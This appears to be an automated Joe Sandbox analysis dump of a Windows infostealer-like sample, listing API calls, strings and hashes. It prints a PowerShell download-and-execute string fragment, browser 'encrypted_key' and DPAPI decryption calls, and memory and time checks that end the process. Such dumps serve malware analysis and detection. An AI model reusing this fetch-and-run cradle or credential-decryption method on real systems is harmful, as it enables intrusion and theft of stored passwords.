                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                      • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                      APIs
                      • strlen.MSVCRT ref: 04117186
                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,04117401,00000000,00420BA8,00000000,00000000), ref: 041171B4
                        • Part of subcall function 04116E37: strlen.MSVCRT ref: 04116E48
                        • Part of subcall function 04116E37: strlen.MSVCRT ref: 04116E6C
                      • VirtualQueryEx.KERNEL32(04117574,00000000,?,0000001C), ref: 041171F9
                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04117401), ref: 0411731A
                        • Part of subcall function 04117047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0411705F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: strlen$MemoryProcessQueryReadVirtual
                      • String ID: @
                      • API String ID: 2950663791-2766056989
                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                      • Instruction ID: d595db140b3fb6a26df68eaa09600f3f3439a7d91528b46dafde26e92eb524af
                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                      • Instruction Fuzzy Hash: 8551FAB1E04109EBDB08CF94D991AEFB7B5BF88300F148569F925A7390D734AA11CBA5
                      APIs
                      • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: *n@$*n@
                      • API String ID: 1029625771-193229609
                      • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                      • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                      • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                      • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                      APIs
                      • lstrcat.KERNEL32(?,0064A30C), ref: 04114A42
                        • Part of subcall function 04119047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04119072
                      • lstrcat.KERNEL32(?,00000000), ref: 04114A68
                      • lstrcat.KERNEL32(?,?), ref: 04114A87
                      • lstrcat.KERNEL32(?,?), ref: 04114A9B
                      • lstrcat.KERNEL32(?,0064A284), ref: 04114AAE
                      • lstrcat.KERNEL32(?,?), ref: 04114AC2
                      • lstrcat.KERNEL32(?,0064A2C8), ref: 04114AD6
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 04118FF7: GetFileAttributesA.KERNEL32(00000000,?,04101DBB,?,?,00425654,?,?,00420E1F), ref: 04119006
                        • Part of subcall function 041147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 041147E7
                        • Part of subcall function 041147D7: RtlAllocateHeap.NTDLL(00000000), ref: 041147EE
                        • Part of subcall function 041147D7: wsprintfA.USER32 ref: 0411480D
                        • Part of subcall function 041147D7: FindFirstFileA.KERNEL32(?,?), ref: 04114824
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                      • Instruction ID: 0333ceb15cd0e8c25f5efaa37fa345cf17040a5ec20cdf6faab5859c8c10ab0d
                      • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                      • Instruction Fuzzy Hash: 0C3180B69402086BEB14FBF0DCC4EED7379AB48704F4085D9A24596090EFB5A789CB99
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                      Strings
                      • ')", xrefs: 00412CB3
                      • <, xrefs: 00412D39
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 87b9259d62867265d03d3ccf5b91407801732a693daf99fd9e22ca77cb073214
                      • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                      • Opcode Fuzzy Hash: 87b9259d62867265d03d3ccf5b91407801732a693daf99fd9e22ca77cb073214
                      • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 041014A5
                      • __aulldiv.LIBCMT ref: 041014BF
                      • __aulldiv.LIBCMT ref: 041014CD
                      • ExitProcess.KERNEL32 ref: 041014FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                      • Instruction ID: 96f8f70a6856076935d18f618b6de42fc535d21c5f462fc3cacd031780412499
                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                      • Instruction Fuzzy Hash: E601FBB0944348FAEF10EFD0DCC9B9DBAB8AB01709F208458F605BB2D0D7B9B5458755
                      APIs
                      • memcmp.MSVCRT(?,00421264,00000003), ref: 0410A094
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 04110CC7: memset.MSVCRT ref: 04110E83
                        • Part of subcall function 04110CC7: lstrcat.KERNEL32(?,00000000), ref: 04110E9C
                        • Part of subcall function 04110CC7: lstrcat.KERNEL32(?,00420D7C), ref: 04110EAE
                        • Part of subcall function 04110CC7: lstrcat.KERNEL32(?,00000000), ref: 04110EC4
                        • Part of subcall function 04110CC7: lstrcat.KERNEL32(?,00420D80), ref: 04110ED6
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • memcmp.MSVCRT(?,00421114,00000003), ref: 0410A116
                      • memset.MSVCRT ref: 0410A14F
                      • LocalAlloc.KERNEL32(00000040,?), ref: 0410A1A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                      • String ID: @
                      • API String ID: 1977917189-2766056989
                      • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                      • Instruction ID: c4e7a800a42da9f8d9dcb3ac521e60a8be3292e808f12b7398db7e7b98a8f1ee
                      • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                      • Instruction Fuzzy Hash: 55614B31A00248EBDB18EFA4DDD5FED7B75BF54344F408128E90AAB5A0EBB47A05CB51
                      APIs
                      • strtok_s.MSVCRT ref: 00410DB8
                      • strtok_s.MSVCRT ref: 00410EFD
                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,025165B0,?,0042110C,?,00000000), ref: 0041A82B
                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: strtok_s$lstrcpylstrlen
                      • String ID:
                      • API String ID: 348468850-0
                      • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                      • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                      • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                      • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                        • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                        • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                        • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                        • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 3731072634-738592651
                      • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                      • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                      • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                      • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodeInfoPageValidmemset
                      • String ID:
                      • API String ID: 703783727-0
                      • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                      • Instruction ID: 37b454949ef294caf84a21cee73c198ea51c775f8435841aece25130c3ee78a9
                      • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                      • Instruction Fuzzy Hash: A231E930A482919EEB258F75C8D43797FA09B06314B0941FAD886CF1A1F328E405D7D1
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 04116BD3
                      • sscanf.NTDLL ref: 04116C00
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 04116C19
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 04116C27
                      • ExitProcess.KERNEL32 ref: 04116C41
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                      • Instruction ID: ac0b115d7ac775da87241e58230b26622c6a0798b1098bf1e1f8e51b1226fcb1
                      • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                      • Instruction Fuzzy Hash: 5121EBB5D04209AFDF08EFE4D985AEEB7B6FF48300F04852EE406A3250EB356604CB65
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                      • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,0251A080,00000000,00020119,?), ref: 00417E5E
                      • RegQueryValueExA.ADVAPI32(?,0254D650,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                      • RegCloseKey.ADVAPI32(?), ref: 00417E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3466090806-0
                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                      • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                      • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0411809E
                      • RtlAllocateHeap.NTDLL(00000000), ref: 041180A5
                      • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 041180C5
                      • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 041180E6
                      • RegCloseKey.ADVAPI32(?), ref: 041180F9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                      • Instruction ID: a1f395266fb71c49d00f216fa17cfb715c31578cbff2774ce5bb59a4812e8dce
                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                      • Instruction Fuzzy Hash: 4F118FB6A84209FFD704DFD4DC4AFBBB7B9EB05700F008119F615A7290D77568008BA2
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0411799B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 041179A2
                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,04117920), ref: 041179C2
                      • RegQueryValueExA.ADVAPI32(04117920,00420AAC,00000000,00000000,?,000000FF), ref: 041179E1
                      • RegCloseKey.ADVAPI32(04117920), ref: 041179EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                      • Instruction ID: 2de873e573e7a25ca336fdd5025dc8520288bf0830fc50f0934c82222b5c15a4
                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                      • Instruction Fuzzy Hash: 880144B9A40308BFEB10DFE0DC49FAEB7B9EB44701F104559FA05A7290D77465008F51
                      APIs
                      • StrStrA.SHLWAPI(0254C888,?,?,?,0041140C,?,0254C888,00000000), ref: 0041926C
                      • lstrcpyn.KERNEL32(0064AB88,0254C888,0254C888,?,0041140C,?,0254C888), ref: 00419290
                      • lstrlenA.KERNEL32(?,?,0041140C,?,0254C888), ref: 004192A7
                      • wsprintfA.USER32 ref: 004192C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                      • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                      • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                      • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                      • RegCloseKey.ADVAPI32(?), ref: 004012FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3466090806-0
                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                      • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                      • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0410151B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 04101522
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0410153E
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0410155C
                      • RegCloseKey.ADVAPI32(?), ref: 04101566
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                      • Instruction ID: cc535c7be6e2097c64999a6cde89ab49cffb95c0bb591d420550a3e8a8c16825
                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                      • Instruction Fuzzy Hash: 650131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D675AA018F91
                      APIs
                      • __getptd.LIBCMT ref: 0041C74E
                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                      • __getptd.LIBCMT ref: 0041C765
                      • __amsg_exit.LIBCMT ref: 0041C773
                      • __lock.LIBCMT ref: 0041C783
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                      • String ID:
                      • API String ID: 938513278-0
                      • Opcode ID: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                      • Instruction ID: 747b7d94d78dcab7bc4ad9ba185e37b4c367e78d81b7dca89f1d9f587bf674ed
                      • Opcode Fuzzy Hash: efdb286082815a34fe65cdf39a39efb78846e04f1ab798c9691acb082f02800f
                      • Instruction Fuzzy Hash: EBF09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                      APIs
                      • __getptd.LIBCMT ref: 0411C9B5
                        • Part of subcall function 0411C206: __getptd_noexit.LIBCMT ref: 0411C209
                        • Part of subcall function 0411C206: __amsg_exit.LIBCMT ref: 0411C216
                      • __getptd.LIBCMT ref: 0411C9CC
                      • __amsg_exit.LIBCMT ref: 0411C9DA
                      • __lock.LIBCMT ref: 0411C9EA
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0411C9FE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                      • String ID:
                      • API String ID: 938513278-0
